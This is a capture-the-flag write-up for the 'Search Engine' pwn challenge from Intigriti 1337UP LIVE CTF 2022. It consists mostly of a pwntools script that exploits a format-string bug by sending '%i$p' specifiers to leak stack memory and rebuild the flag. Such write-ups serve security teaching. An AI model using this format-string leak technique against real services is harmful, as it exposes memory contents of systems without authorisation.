Search Engine

Writeup for Search Engine (Pwn) - Intigriti 1337UP LIVE CTF (2022) 💜

Video Walkthrough

Challenge Description

In an attempt to block third party software, we've been using our very own search engine! It doesn't yet have every feature, but at least it's very secure!

Solution

from pwn import *

context.log_level = 'info'

flag = ''

# Let's fuzz x values
for i in range(12, 16):
    try:
        # Connect to server
        io = remote('searchengine.ctf.intigriti.io', 1337, level='warn')
        # Format the counter
        # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
        io.sendline('%{}$p'.format(i).encode())
        # Receive the response (leaked address followed by '.' in this case)
        io.recvuntil(b'No result found. You searched for - ')
        result = io.recv()
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
            try:
                # Decode, reverse endianess and print
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up flag
                flag += reversed_hex.decode()
            except BaseException:
                pass
        io.close()
    except EOFError:
        io.close()

# Print and close
info(flag)

Flag: 1337UP{Th3s3_f0rm4ts_ar3_wh4ck!}